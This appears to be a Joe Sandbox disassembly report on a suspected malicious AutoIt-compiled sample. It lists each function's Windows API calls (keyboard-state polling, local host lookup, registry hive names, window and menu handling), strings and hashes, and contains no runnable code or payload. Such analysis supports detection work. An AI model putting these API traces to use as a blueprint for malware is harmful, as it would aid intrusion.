Snapshot File: hcaresult_0_2_960000_SecuriteInfo.jbxd

Similarity

API ID: LoadString__swprintf_wprintf$_memmove
String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
API String ID: 311963372-2391861430
Opcode ID: 6ebb1e68f8657bde69cbf5887605844770739988bf3cacbb96a7fc0c43552036
Instruction ID: dc51763baeba480d2029a460cadad069d28a4f44a0e393541961eede96ebc53d
Opcode Fuzzy Hash: 6ebb1e68f8657bde69cbf5887605844770739988bf3cacbb96a7fc0c43552036
Instruction Fuzzy Hash: DC519A32D04209ABCF25EBE0CD92FEEB778AF44308F100565F515621A2EB316F59CB62

Uniqueness

Uniqueness Score: -1.00%

Function 00966BEC Relevance: 19.7, APIs: 4, Strings: 7, Instructions: 478COMMON

Download Yara Rule

APIs

Part of subcall function 00980B9B: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,00966C6C,?,00008000), ref: 00980BB7

Part of subcall function 009648AE: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,009648A1,?,?,009637C0,?), ref: 009648CE

SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00966D0D
SetCurrentDirectoryW.KERNEL32(?), ref: 00966E5A

Part of subcall function 009659CD: _wcscpy.LIBCMT ref: 00965A05

Part of subcall function 0098387D: _iswctype.LIBCMT ref: 00983885

Strings

AU3!, xrefs: 00966CC1
Error opening the file, xrefs: 0099E866, 0099E8E1
EA06, xrefs: 0099E87B
Bad directive syntax error, xrefs: 0099EBC6
#include depth exceeded. Make sure there are no recursive includes, xrefs: 0099E84A
Unterminated string, xrefs: 0099EC0D
>>>AUTOIT SCRIPT<<<, xrefs: 0099E8BF

Memory Dump Source

Source File: 00000000.00000002.2133394724.0000000000961000.00000020.00000001.01000000.00000003.sdmp, Offset: 00960000, based on PE: true

Associated: 00000000.00000002.2133170296.0000000000960000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.00000000009EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.0000000000A15000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133517312.0000000000A1F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133535196.0000000000A28000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_960000_SecuriteInfo.jbxd

Similarity

API ID: CurrentDirectory$FullNamePath_iswctype_wcscpy
String ID: #include depth exceeded. Make sure there are no recursive includes$>>>AUTOIT SCRIPT<<<$AU3!$Bad directive syntax error$EA06$Error opening the file$Unterminated string
API String ID: 537147316-1018226102
Opcode ID: 050c078b2f8c6bb387a1625a33b83806c90176b8411d2ae9098c719eac2640b2
Instruction ID: e3c0c64da5699eba46922ea00d7ca5be825c899a064dd40b1c9ec41bde997df0
Opcode Fuzzy Hash: 050c078b2f8c6bb387a1625a33b83806c90176b8411d2ae9098c719eac2640b2
Instruction Fuzzy Hash: 45028C311083419FCB24EF64C991AAFBBE5BFD9354F04491DF48A972A2DB31D949CB42

Uniqueness

Uniqueness Score: -1.00%

Function 009645DF Relevance: 19.7, APIs: 13, Instructions: 215windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 009645F9
GetMenuItemCount.USER32(00A26890), ref: 0099D7CD
GetMenuItemCount.USER32(00A26890), ref: 0099D87D
GetCursorPos.USER32(?), ref: 0099D8C1
SetForegroundWindow.USER32(00000000), ref: 0099D8CA
TrackPopupMenuEx.USER32(00A26890,00000000,?,00000000,00000000,00000000), ref: 0099D8DD
PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 0099D8E9

Memory Dump Source

Source File: 00000000.00000002.2133394724.0000000000961000.00000020.00000001.01000000.00000003.sdmp, Offset: 00960000, based on PE: true

Associated: 00000000.00000002.2133170296.0000000000960000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.00000000009EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.0000000000A15000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133517312.0000000000A1F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133535196.0000000000A28000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_960000_SecuriteInfo.jbxd

Similarity

API ID: Menu$CountItem$CursorForegroundMessagePopupPostTrackWindow_memset
String ID:
API String ID: 2751501086-0
Opcode ID: 42f7c55c366d30176a8619a67d921e0603bcee1995db779167447bf8553cb9c7
Instruction ID: 4572b86159a024e1e073fea4ad9e73e8fb10fb9d0338575433c380ece837dfc3
Opcode Fuzzy Hash: 42f7c55c366d30176a8619a67d921e0603bcee1995db779167447bf8553cb9c7
Instruction Fuzzy Hash: 8B710570606245BAFF218F99DCC5FAABF68FF45364F200216F515AA1E1CBB55C10DB90

Uniqueness

Uniqueness Score: -1.00%

Function 009E10A5 Relevance: 19.4, APIs: 1, Strings: 10, Instructions: 120COMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?,?,?,?,?,?,009E0038,?,?), ref: 009E10BC

Strings

HKEY_LOCAL_MACHINE, xrefs: 009E1125
HKU, xrefs: 009E11CE
HKLM, xrefs: 009E113A
HKEY_CLASSES_ROOT, xrefs: 009E114F
HKEY_CURRENT_CONFIG, xrefs: 009E1179
HKCC, xrefs: 009E118A
HKCR, xrefs: 009E1164
HKEY_USERS, xrefs: 009E11BD
HKEY_CURRENT_USER, xrefs: 009E119B
HKCU, xrefs: 009E11AC

Memory Dump Source

Source File: 00000000.00000002.2133394724.0000000000961000.00000020.00000001.01000000.00000003.sdmp, Offset: 00960000, based on PE: true

Associated: 00000000.00000002.2133170296.0000000000960000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.00000000009EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.0000000000A15000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133517312.0000000000A1F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133535196.0000000000A28000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_960000_SecuriteInfo.jbxd

Similarity

API ID: BuffCharUpper
String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
API String ID: 3964851224-909552448
Opcode ID: e10e295b542f3f171ea52a69df3aea1682a8b8fb157e154485a51c250c1a13a0
Instruction ID: 5ffefbd09f4f00b87cb5c5c478f7e633de1b35c108178c78654b0c5567478852
Opcode Fuzzy Hash: e10e295b542f3f171ea52a69df3aea1682a8b8fb157e154485a51c250c1a13a0
Instruction Fuzzy Hash: 1F41693026428EDBCF11EF91DC91AEA3729BF95340F104554FDA55B392DB30AE5ACBA0

Uniqueness

Uniqueness Score: -1.00%

Function 009C5569 Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 74COMMON

Download Yara Rule

APIs

Part of subcall function 00967D2C: _memmove.LIBCMT ref: 00967D66

Part of subcall function 00967A84: _memmove.LIBCMT ref: 00967B0D

mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 009C55D2
mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 009C55E8
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 009C55F9
mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 009C560B
mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 009C561C

Strings

close PlayMe, xrefs: 009C55E3, 009C5610
status PlayMe mode, xrefs: 009C55CD
play PlayMe, xrefs: 009C5617
play PlayMe wait, xrefs: 009C5606
alias PlayMe, xrefs: 009C55AB
open , xrefs: 009C5581

Memory Dump Source

Source File: 00000000.00000002.2133394724.0000000000961000.00000020.00000001.01000000.00000003.sdmp, Offset: 00960000, based on PE: true

Associated: 00000000.00000002.2133170296.0000000000960000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.00000000009EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.0000000000A15000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133517312.0000000000A1F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133535196.0000000000A28000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_960000_SecuriteInfo.jbxd

Similarity

API ID: SendString$_memmove
String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
API String ID: 2279737902-1007645807
Opcode ID: 9be945b17df4dd4c29737818eb97ee9e4a41114558cb3f03dbc0a7750c28653f
Instruction ID: 216aa8ae8d2fec7d832833fd35ca554bba4ed0c37304917ba65ae56d718c4bb2
Opcode Fuzzy Hash: 9be945b17df4dd4c29737818eb97ee9e4a41114558cb3f03dbc0a7750c28653f
Instruction Fuzzy Hash: B111C424A5116979D720B6A1CC9AFFFBB7CFFE1B44F400829B411E60D2DEA01D85C5A2

Uniqueness

Uniqueness Score: -1.00%

Function 009C48F3 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 73networkCOMMON

Download Yara Rule

APIs

WSAStartup.WSOCK32(00000101,?), ref: 009C490E
gethostname.WSOCK32(?,00000100), ref: 009C4928
gethostbyname.WSOCK32(?), ref: 009C4935
_wcscpy.LIBCMT ref: 009C495D
_memmove.LIBCMT ref: 009C4970
inet_ntoa.WSOCK32(?), ref: 009C497B
_strcat.LIBCMT ref: 009C4989
_wcscpy.LIBCMT ref: 009C49A0
WSACleanup.WSOCK32 ref: 009C49AE
_wcscpy.LIBCMT ref: 009C49BC

Strings

0.0.0.0, xrefs: 009C4957

Memory Dump Source

Source File: 00000000.00000002.2133394724.0000000000961000.00000020.00000001.01000000.00000003.sdmp, Offset: 00960000, based on PE: true

Associated: 00000000.00000002.2133170296.0000000000960000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.00000000009EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.0000000000A15000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133517312.0000000000A1F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133535196.0000000000A28000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_960000_SecuriteInfo.jbxd

Similarity

API ID: _wcscpy$CleanupStartup_memmove_strcatgethostbynamegethostnameinet_ntoa
String ID: 0.0.0.0
API String ID: 208665112-3771769585
Opcode ID: 5ec13c29caa9b4379486ec6340ab848f3216b92bd899c1e9820e278909c63069
Instruction ID: 4ab2424e64d75331f67668839566d65595184af2cde27c6f6e0611ce82f3302b
Opcode Fuzzy Hash: 5ec13c29caa9b4379486ec6340ab848f3216b92bd899c1e9820e278909c63069
Instruction Fuzzy Hash: 8911D232E08125ABCB20AB249C5AFDB77ACDF80B10F0401BAF5459A191EF719E819762

Uniqueness

Uniqueness Score: -1.00%

Function 009C5217 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 72sleepwindowtimeCOMMON

Download Yara Rule

APIs

timeGetTime.WINMM ref: 009C521C

Part of subcall function 00980719: timeGetTime.WINMM(?,7694B400,00970FF9), ref: 0098071D

Sleep.KERNEL32(0000000A), ref: 009C5248
EnumThreadWindows.USER32(?,Function_000651CA,00000000), ref: 009C526C
FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 009C528E
SetActiveWindow.USER32 ref: 009C52AD
SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 009C52BB
SendMessageW.USER32(00000010,00000000,00000000), ref: 009C52DA
Sleep.KERNEL32(000000FA), ref: 009C52E5
IsWindow.USER32 ref: 009C52F1
EndDialog.USER32(00000000), ref: 009C5302

Strings

BUTTON, xrefs: 009C5280

Memory Dump Source

Source File: 00000000.00000002.2133394724.0000000000961000.00000020.00000001.01000000.00000003.sdmp, Offset: 00960000, based on PE: true

Associated: 00000000.00000002.2133170296.0000000000960000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.00000000009EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.0000000000A15000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133517312.0000000000A1F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133535196.0000000000A28000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_960000_SecuriteInfo.jbxd

Similarity

API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
String ID: BUTTON
API String ID: 1194449130-3405671355
Opcode ID: 2bd2faacddc8f2a0fd9648a96103a5d17e3fa114b3e44f5e18c78ba65c94432d
Instruction ID: 04e6ec4c7a0662d4878f26e5fb6d7a129e169d02cde5632ef34350ae8dc0e568
Opcode Fuzzy Hash: 2bd2faacddc8f2a0fd9648a96103a5d17e3fa114b3e44f5e18c78ba65c94432d
Instruction Fuzzy Hash: B721A470508784AFE7109BA4ECD8F3D7BADEB95746F41043DF402851B1CB71AE829B22

Uniqueness

Uniqueness Score: -1.00%

Function 009CD7F8 Relevance: 18.3, APIs: 12, Instructions: 283comCOMMON

Download Yara Rule

APIs

Part of subcall function 00969997: __itow.LIBCMT ref: 009699C2
Part of subcall function 00969997: __swprintf.LIBCMT ref: 00969A0C

CoInitialize.OLE32(00000000), ref: 009CD855
SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 009CD8E8
SHGetDesktopFolder.SHELL32(?), ref: 009CD8FC
CoCreateInstance.OLE32(009F2D7C,00000000,00000001,00A1A89C,?), ref: 009CD948
SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 009CD9B7
CoTaskMemFree.OLE32(?,?), ref: 009CDA0F
_memset.LIBCMT ref: 009CDA4C
SHBrowseForFolderW.SHELL32(?), ref: 009CDA88
SHGetPathFromIDListW.SHELL32(00000000,?), ref: 009CDAAB
CoTaskMemFree.OLE32(00000000), ref: 009CDAB2
CoTaskMemFree.OLE32(00000000,00000001,00000000), ref: 009CDAE9
CoUninitialize.OLE32(00000001,00000000), ref: 009CDAEB

Memory Dump Source

Source File: 00000000.00000002.2133394724.0000000000961000.00000020.00000001.01000000.00000003.sdmp, Offset: 00960000, based on PE: true

Associated: 00000000.00000002.2133170296.0000000000960000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.00000000009EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.0000000000A15000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133517312.0000000000A1F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133535196.0000000000A28000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_960000_SecuriteInfo.jbxd

Similarity

API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize__itow__swprintf_memset
String ID:
API String ID: 1246142700-0
Opcode ID: 0cba2adff968ca9030604f6fd8289bcbdcc5056832cd244e81a8255e2ea8244b
Instruction ID: 0b41c63f88eb72db487670f360ffe4701f0e8e3a34c70829f7682ab0e39e1ba4
Opcode Fuzzy Hash: 0cba2adff968ca9030604f6fd8289bcbdcc5056832cd244e81a8255e2ea8244b
Instruction Fuzzy Hash: 0DB1FD75A00109AFDB04DFA5C898EAEBBF9FF89314B148469F509EB261DB30ED41CB51

Uniqueness

Uniqueness Score: -1.00%

Function 009C052C Relevance: 18.2, APIs: 12, Instructions: 186keyboardCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?), ref: 009C05A7
SetKeyboardState.USER32(?), ref: 009C0612
GetAsyncKeyState.USER32(000000A0), ref: 009C0632
GetKeyState.USER32(000000A0), ref: 009C0649
GetAsyncKeyState.USER32(000000A1), ref: 009C0678
GetKeyState.USER32(000000A1), ref: 009C0689
GetAsyncKeyState.USER32(00000011), ref: 009C06B5
GetKeyState.USER32(00000011), ref: 009C06C3
GetAsyncKeyState.USER32(00000012), ref: 009C06EC
GetKeyState.USER32(00000012), ref: 009C06FA
GetAsyncKeyState.USER32(0000005B), ref: 009C0723
GetKeyState.USER32(0000005B), ref: 009C0731

Memory Dump Source

Source File: 00000000.00000002.2133394724.0000000000961000.00000020.00000001.01000000.00000003.sdmp, Offset: 00960000, based on PE: true

Associated: 00000000.00000002.2133170296.0000000000960000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.00000000009EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.0000000000A15000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133517312.0000000000A1F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133535196.0000000000A28000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_960000_SecuriteInfo.jbxd

Similarity

API ID: State$Async$Keyboard
String ID:
API String ID: 541375521-0
Opcode ID: c32f7c61aa766c2008ff07c73d82a1ea341a5e0a11955970a87150e7d9cd1bb7
Instruction ID: 2e22fa8797b30e05999235f54f817a3b14f895b9c103d2e0949fef3a9b55e68e
Opcode Fuzzy Hash: c32f7c61aa766c2008ff07c73d82a1ea341a5e0a11955970a87150e7d9cd1bb7
Instruction Fuzzy Hash: C951DB20E087C45AFB34DBA08955FEABFB89F92380F08459E95C25B1C3DA549B4CCB57

Uniqueness

Uniqueness Score: -1.00%

Function 009BC72A Relevance: 18.2, APIs: 12, Instructions: 174COMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,00000001), ref: 009BC746
GetWindowRect.USER32(00000000,?), ref: 009BC758
MoveWindow.USER32(00000001,0000000A,?,00000001,?,00000000), ref: 009BC7B6
GetDlgItem.USER32(?,00000002), ref: 009BC7C1
GetWindowRect.USER32(00000000,?), ref: 009BC7D3
MoveWindow.USER32(00000001,?,00000000,00000001,?,00000000), ref: 009BC827
GetDlgItem.USER32(?,000003E9), ref: 009BC835
GetWindowRect.USER32(00000000,?), ref: 009BC846
MoveWindow.USER32(00000000,0000000A,00000000,?,?,00000000), ref: 009BC889
GetDlgItem.USER32(?,000003EA), ref: 009BC897
MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 009BC8B4
InvalidateRect.USER32(?,00000000,00000001), ref: 009BC8C1

Memory Dump Source

Source File: 00000000.00000002.2133394724.0000000000961000.00000020.00000001.01000000.00000003.sdmp, Offset: 00960000, based on PE: true

Associated: 00000000.00000002.2133170296.0000000000960000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.00000000009EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.0000000000A15000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133517312.0000000000A1F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133535196.0000000000A28000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_960000_SecuriteInfo.jbxd

Similarity

API ID: Window$ItemMoveRect$Invalidate
String ID:
API String ID: 3096461208-0
Opcode ID: ea2fe696ed8f01f2cb743a5a4a388c2dbf43328dd7907243088bbf017eb0e257
Instruction ID: 48bddc15b97ab76fb5af280e2b15d2a64214e9e788e4ec8ec4dbe6dfbd6fe023
Opcode Fuzzy Hash: ea2fe696ed8f01f2cb743a5a4a388c2dbf43328dd7907243088bbf017eb0e257
Instruction Fuzzy Hash: 395131B1B10205AFDF18CFA9DD99AAEBBBAEB88711F14812DF515D7290D7709D00CB50

Uniqueness

Uniqueness Score: -1.00%

Function 0096201B Relevance: 18.2, APIs: 12, Instructions: 170timeCOMMON

Download Yara Rule

APIs

Part of subcall function 00961B41: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00962036,?,00000000,?,?,?,?,009616CB,00000000,?), ref: 00961B9A

DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 009620D3
KillTimer.USER32(-00000001,?,?,?,?,009616CB,00000000,?,?,00961AE2,?,?), ref: 0096216E
DestroyAcceleratorTable.USER32(00000000), ref: 0099BEF6
ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,009616CB,00000000,?,?,00961AE2,?,?), ref: 0099BF27
ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,009616CB,00000000,?,?,00961AE2,?,?), ref: 0099BF3E
ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,009616CB,00000000,?,?,00961AE2,?,?), ref: 0099BF5A
DeleteObject.GDI32(00000000), ref: 0099BF6C

Memory Dump Source

Source File: 00000000.00000002.2133394724.0000000000961000.00000020.00000001.01000000.00000003.sdmp, Offset: 00960000, based on PE: true

Associated: 00000000.00000002.2133170296.0000000000960000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.00000000009EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.0000000000A15000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133517312.0000000000A1F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133535196.0000000000A28000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_960000_SecuriteInfo.jbxd

Similarity

API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
String ID:
API String ID: 641708696-0
Opcode ID: 56270618e3455205b5526bc4d6ec33f68103695df4c185a100adb369e6a69d27
Instruction ID: 359b2df5c9ab649ea8c7abe694c8e856b58839b310e63b09878bab64f8024e70
Opcode Fuzzy Hash: 56270618e3455205b5526bc4d6ec33f68103695df4c185a100adb369e6a69d27
Instruction Fuzzy Hash: DF618C31109A50EFCB35EF58EE98B39B7F5FB40312F104829E5429A961C779AC92DF90

Uniqueness

Uniqueness Score: -1.00%

Function 009621A5 Relevance: 18.1, APIs: 12, Instructions: 132COMMON

Download Yara Rule

APIs

Part of subcall function 009625DB: GetWindowLongW.USER32(?,000000EB), ref: 009625EC

GetSysColor.USER32(0000000F), ref: 009621D3

Memory Dump Source

Source File: 00000000.00000002.2133394724.0000000000961000.00000020.00000001.01000000.00000003.sdmp, Offset: 00960000, based on PE: true

Associated: 00000000.00000002.2133170296.0000000000960000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.00000000009EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.0000000000A15000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133517312.0000000000A1F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133535196.0000000000A28000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_960000_SecuriteInfo.jbxd

Similarity

API ID: ColorLongWindow
String ID:
API String ID: 259745315-0
Opcode ID: f7f2ce995ebcb2a288e6607f2ff484810504f62d7d3487f8b7987b320049d377
Instruction ID: a71b92240f54becbefca84c8d56c1c43df6e729c6f8cb6be061e012d578b029d
Opcode Fuzzy Hash: f7f2ce995ebcb2a288e6607f2ff484810504f62d7d3487f8b7987b320049d377
Instruction Fuzzy Hash: D841B331008584DBDF255F28DCA8BB93769EB06331F148266FD758E1E2C7318D42EB21

Uniqueness

Uniqueness Score: -1.00%

Function 009CAB12 Relevance: 17.7, APIs: 3, Strings: 7, Instructions: 183COMMON

Download Yara Rule

APIs

CharLowerBuffW.USER32(?,?,009EF910), ref: 009CAB76
GetDriveTypeW.KERNEL32(00000061,00A1A620,00000061), ref: 009CAC40
_wcscpy.LIBCMT ref: 009CAC6A

Strings

removable, xrefs: 009CABA8
ramdisk, xrefs: 009CABEA
network, xrefs: 009CABD4
all, xrefs: 009CAB7C
fixed, xrefs: 009CABBE
unknown, xrefs: 009CAC01
cdrom, xrefs: 009CAB92

Memory Dump Source

Source File: 00000000.00000002.2133394724.0000000000961000.00000020.00000001.01000000.00000003.sdmp, Offset: 00960000, based on PE: true

Associated: 00000000.00000002.2133170296.0000000000960000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.00000000009EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.0000000000A15000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133517312.0000000000A1F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133535196.0000000000A28000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_960000_SecuriteInfo.jbxd

Similarity

API ID: BuffCharDriveLowerType_wcscpy
String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
API String ID: 2820617543-1000479233
Opcode ID: 85ac6a23524c47d7607d7fc58f8981d5d256dcab2a4a493a5eb36ec552b712da
Instruction ID: b5e0012cdc327eb76619cc5c0423df6d8bda3ad8520451cd48280febbda6bfd2
Opcode Fuzzy Hash: 85ac6a23524c47d7607d7fc58f8981d5d256dcab2a4a493a5eb36ec552b712da
Instruction Fuzzy Hash: AA51AD31A483059BC710EF14C891FAAB7AAEFD4318F54482DF4965B2E2DB31AD49CB53

Uniqueness

Uniqueness Score: -1.00%

Function 00969997 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 146COMMON

Download Yara Rule

APIs

__itow.LIBCMT ref: 009699C2
__swprintf.LIBCMT ref: 00969A0C
__i64tow.LIBCMT ref: 0099FA0F

Strings

True, xrefs: 0099F9D0
0x%p, xrefs: 0099F9F1
False, xrefs: 0099F9D7
%.15g, xrefs: 00969A06

Memory Dump Source

Source File: 00000000.00000002.2133394724.0000000000961000.00000020.00000001.01000000.00000003.sdmp, Offset: 00960000, based on PE: true

Associated: 00000000.00000002.2133170296.0000000000960000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.00000000009EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.0000000000A15000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133517312.0000000000A1F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133535196.0000000000A28000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_960000_SecuriteInfo.jbxd

Similarity

API ID: __i64tow__itow__swprintf
String ID: %.15g$0x%p$False$True
API String ID: 421087845-2263619337
Opcode ID: a219673b1a5b646c2fb351ee839f1a6a8a992eba3fdceb393dcdd5700e217fab
Instruction ID: fa5d376df4893acbae19fa488368b0af0c7876e8aed2038db2fe66020169d9b6
Opcode Fuzzy Hash: a219673b1a5b646c2fb351ee839f1a6a8a992eba3fdceb393dcdd5700e217fab
Instruction Fuzzy Hash: D141D172604205AFEF24AF78DC42F7AB3ECEB84310F20486EE549D7291EA719941CB11

Uniqueness

Uniqueness Score: -1.00%

Function 009E73C1 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 103windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 009E73D9
CreateMenu.USER32 ref: 009E73F4
SetMenu.USER32(?,00000000), ref: 009E7403
GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 009E7490
IsMenu.USER32(?), ref: 009E74A6
CreatePopupMenu.USER32 ref: 009E74B0
InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 009E74DD
DrawMenuBar.USER32 ref: 009E74E5

Strings

F, xrefs: 009E74D1
0, xrefs: 009E73CF

Memory Dump Source

Source File: 00000000.00000002.2133394724.0000000000961000.00000020.00000001.01000000.00000003.sdmp, Offset: 00960000, based on PE: true

Associated: 00000000.00000002.2133170296.0000000000960000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.00000000009EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.0000000000A15000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133517312.0000000000A1F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133535196.0000000000A28000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_960000_SecuriteInfo.jbxd

Similarity

API ID: Menu$CreateItem$DrawInfoInsertPopup_memset
String ID: 0$F
API String ID: 176399719-3044882817
Opcode ID: e3cd8eb6c5ae2747d1a07288ec098a3e736af1bd4fc5d73910e81d4a35f490a6
Instruction ID: 2de62ab0857d1c93f5419d2474b819cffb69697d70f17c45e8be25c0e1662211
Opcode Fuzzy Hash: e3cd8eb6c5ae2747d1a07288ec098a3e736af1bd4fc5d73910e81d4a35f490a6
